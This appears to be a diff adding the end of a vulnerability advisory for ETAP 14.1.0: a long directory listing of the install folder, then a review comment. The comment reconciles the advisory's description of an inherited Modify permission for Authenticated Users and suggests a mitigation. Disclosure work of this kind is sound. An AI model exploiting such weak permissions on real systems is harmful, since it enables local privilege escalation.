+26/02/2016 16:38 29,184 OtiOpCon64.dll
+19/01/2016 02:28 12,800 OtiPMConfiguration.dll
+26/02/2016 16:38 59,904 OtiRemotecode64.dll
+26/02/2016 16:38 60,928 OtiRemotecodeinterfaces64.dll
+26/02/2016 16:52 538,112 OtiRTDisplay64.dll
+26/02/2016 16:38 9,216 OtiRTDisplayInterface.dll
+26/02/2016 16:38 86,528 OtiRtWpfControls.dll
+26/02/2016 16:38 24,576 OtiRtWpfControlsTelerik.dll
+26/02/2016 16:38 574,976 OTIRuleManager.dll
+26/02/2016 16:38 24,576 OTIRuleManager.XmlSerializers.dll
+26/02/2016 17:22 487,424 otiscenario.dll
+26/02/2016 16:38 16,384 OTIScenario.XmlSerializers.dll
+26/02/2016 16:25 209,920 OtiServerTracker.dll
+26/02/2016 16:38 238,592 OtiServerTracker64.dll
+26/02/2016 16:38 5,632 OtiSQLCERead.dll
+26/02/2016 16:28 96,768 OtiSQLCeViewer.EXE
+19/01/2016 02:28 12,800 OtiSqlUtils.dll
+26/02/2016 16:25 229,888 OtiSymbolCreator.exe
+26/02/2016 16:24 8,704 OtiSymbolData.dll
+26/02/2016 16:25 428,032 OtiSymbolSerializer.dll
+26/02/2016 16:38 1,163,264 otitheme.dll
+26/02/2016 16:38 210,432 otitheme.xmlserializers.dll
+26/02/2016 16:38 287,744 OtiTrack.dll
+19/01/2016 02:02 1,043,505 OtiTranslate.xml
+26/02/2016 16:36 125,952 pdconfig.exe
+19/01/2016 02:31 589,824 PDEUtilities.dll
+01/02/2016 11:14 3,760,128 Pegrp32E.dll
+01/02/2016 11:14 24,576 PerfSol.Diagnostics.dll
+26/02/2016 16:45 98,816 PlotCompare64.exe
+26/02/2016 16:45 159,744 PlotFileReader.dll
+26/02/2016 16:45 477,184 PlotManager.exe
+01/02/2016 11:14 144 PlotManager.exe.config
+01/02/2016 11:14 8,945 postaction.cgt
+01/02/2016 11:14 6,767 precondition.cgt
+19/01/2016 02:28 306,688 psedit.exe
+26/02/2016 16:24 253,440 psevent.dll
+26/02/2016 16:26 1,324,544 psgrid.exe
+08/10/2010 13:20 16,384 psreport.dot
+26/02/2016 16:25 189,440 psrept.exe
+01/02/2016 11:14 223 psrept.exe.config
+26/02/2016 16:25 60,928 pszip.exe
+07/04/2016 11:41 pvdt40
+26/02/2016 16:25 125,952 QCPlot.dll
+26/02/2016 16:39 148,480 qcplot64.dll
+19/01/2016 02:36 201,216 ra.exe
+07/12/2015 22:07 3,593,218 Readme.pdf
+15/11/2002 10:51 13,755 Readme.wizard.xml
+18/12/2007 13:10 99 RegETAP.BAT
+08/10/2010 13:20 14,848 reporta4.dot
+03/08/2000 04:50 1,056,768 ROBOEX32.DLL
+07/04/2016 11:45 Rules
+19/01/2016 02:36 1,939,456 SC3Ph.exe
+19/01/2016 02:35 5,971,968 scansi1p.exe
+19/01/2016 02:36 5,232,640 scansi3p.exe
+19/01/2016 02:35 6,535,168 SCGost1p.exe
+19/01/2016 02:36 6,431,232 sciec1p.exe
+19/01/2016 02:37 5,242,880 sciec3p.exe
+19/01/2016 02:35 4,812,288 sciectr.exe
+19/01/2016 02:37 5,063,680 scsource.exe
+01/02/2016 11:14 21,020 search.avi
+19/01/2016 02:36 7,451,648 SFA.exe
+26/02/2016 16:38 32,768 ShellControl.dll
+19/01/2016 02:32 1,114,112 SkmDataParserLib.dll
+01/02/2016 11:14 77 SO.ini
+19/01/2016 02:36 708,096 so3ph.exe
+19/01/2016 02:34 752,640 stlf.exe
+19/01/2016 02:35 5,911,040 svc.exe
+01/02/2016 11:14 3,198,976 SX.dll
+07/04/2016 11:41 Symbols
+07/04/2016 11:42 SymbolsXaml
+01/02/2016 11:14 1,081,344 SyncFusion.Chart.Base.dll
+01/02/2016 11:14 602,112 SyncFusion.Chart.Windows.dll
+01/02/2016 11:14 61,440 SyncFusion.Compression.Base.dll
+01/02/2016 11:14 122,880 SyncFusion.Core.dll
+01/02/2016 11:14 1,105,920 syncfusion.diagram.base.dll
+01/02/2016 11:14 1,224,704 Syncfusion.Diagram.Windows.dll
+01/02/2016 11:14 3,710,976 Syncfusion.DocIO.Base.dll
+01/02/2016 11:14 16,384 SyncFusion.Grid.Base.dll
+01/02/2016 11:14 16,384 SyncFusion.Grid.Grouping.Base.dll
+01/02/2016 11:14 1,003,520 SyncFusion.Grid.Grouping.Windows.dll
+01/02/2016 11:14 2,146,304 SyncFusion.Grid.Windows.dll
+01/02/2016 11:14 94,208 SyncFusion.GridConverter.Windows.dll
+01/02/2016 11:14 814,080 Syncfusion.GridHelperClasses.Windows.dll
+01/02/2016 11:14 565,248 SyncFusion.Grouping.Base.dll
+01/02/2016 11:14 192,512 SyncFusion.HTMLUI.Base.dll
+01/02/2016 11:14 389,120 SyncFusion.HTMLUI.Windows.dll
+01/02/2016 11:14 53,248 SyncFusion.Scripting.Base.dll
+01/02/2016 11:14 131,072 SyncFusion.Scripting.Windows.dll
+01/02/2016 11:14 4,055,040 SyncFusion.Shared.Base.dll
+01/02/2016 11:14 26,112 SyncFusion.Shared.Windows.dll
+01/02/2016 11:14 13,049,856 Syncfusion.Shared.Wpf.dll
+01/02/2016 11:14 16,384 SyncFusion.Tools.Base.dll
+01/02/2016 11:14 9,453,568 SyncFusion.Tools.Windows.dll
+01/02/2016 11:14 4,284,416 SyncFusion.XlsIO.Base.dll
+01/02/2016 11:14 7,090 syslogic.cgt
+07/04/2016 11:41 Tables
+01/02/2016 11:14 8,700 tables.ecd
+01/02/2016 11:14 389,120 tag.mdb
+19/01/2016 02:31 172,032 tccconvert.dll
+19/01/2016 02:31 516,608 tccimport.exe
+19/01/2016 02:36 2,227,200 TDULF.exe
+19/01/2016 02:31 205,824 TDUpdate.exe
+01/02/2016 11:14 1,308,672 Telerik.Windows.Controls.Chart.dll
+01/02/2016 11:14 3,068,928 Telerik.Windows.Controls.Charting.dll
+01/02/2016 11:14 1,734,656 Telerik.Windows.Controls.Data.dll
+01/02/2016 11:14 4,346,368 Telerik.Windows.Controls.DataVisualization.dll
+01/02/2016 11:14 3,376,640 Telerik.Windows.Controls.dll
+01/02/2016 11:14 876,032 Telerik.Windows.Controls.Docking.dll
+01/02/2016 11:14 1,039,872 Telerik.Windows.Controls.Gauge.dll
+01/02/2016 11:14 270,447 Telerik.Windows.Controls.Gauge.xml
+01/02/2016 11:14 2,611,200 Telerik.Windows.Controls.GridView.dll
+01/02/2016 11:14 2,254,336 Telerik.Windows.Controls.Input.dll
+01/02/2016 11:14 2,712,576 Telerik.Windows.Controls.Navigation.dll
+01/02/2016 11:14 1,668,096 Telerik.Windows.Controls.RibbonView.dll
+01/02/2016 11:14 1,863,168 Telerik.Windows.Controls.ScheduleView.dll
+01/02/2016 11:14 405,948 Telerik.Windows.Controls.xml
+01/02/2016 11:14 453,632 Telerik.Windows.Data.dll
+01/02/2016 11:14 248,444 Telerik.Windows.Data.xml
+07/04/2016 11:41 Themes
+01/02/2016 11:14 56,320 TraceView.exe
+19/01/2016 02:40 29,412,352 ts.exe
+01/02/2016 11:14 63,488 u2lexpo.dll
+01/02/2016 11:14 82,432 u2lsqrt.dll
+01/02/2016 11:14 27,136 u2lstrng.dll
+19/01/2016 02:34 71,680 UC.exe
+26/02/2016 16:24 620,032 WCT32DR3.dll
+26/02/2016 16:38 722,944 wct32dr364.dll
+30/09/2015 14:48 45,843 WhatsNew_14.htm
+12/11/2014 14:32 3,702 WorkPermitTemplate.xml
+26/02/2016 16:25 492,032 WRT32DR3.dll
+26/02/2016 16:39 592,384 wrt32dr364.dll
+ 395 File(s) 992,689,139 bytes
+ 19 Dir(s) 11,092,480,000 bytes free
+
+C:\ETAP 1410>
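Review bot: The Desc paragraph names the weakness as the 'C' flag (Change) for 'Authenticated Users', but both icacls captures below it show `(I)(M)` and `(I)(OI)(CI)(IO)(M)`, i.e. an inherited Modify entry; `C` is the letter the older cacls tool prints, so the text and the evidence should agree, e.g. `with the 'M' flag (Modify) for 'Authenticated Users' group.` The advisory also ends at the directory listing with no remediation guidance; a closing line such as `Mitigation: restrict 'Authenticated Users' to read/execute on the install directory (or install under a protected path) and re-check with icacls.` would give defenders something to act on. Since the directory-level entry carries `(OI)(CI)`, every file presumably inherits the same right, so the 395-entry listing could be cut down to the executables and DLLs without losing evidence. Minor: `Microsfot` in the Tested-on line is a typo for `Microsoft`.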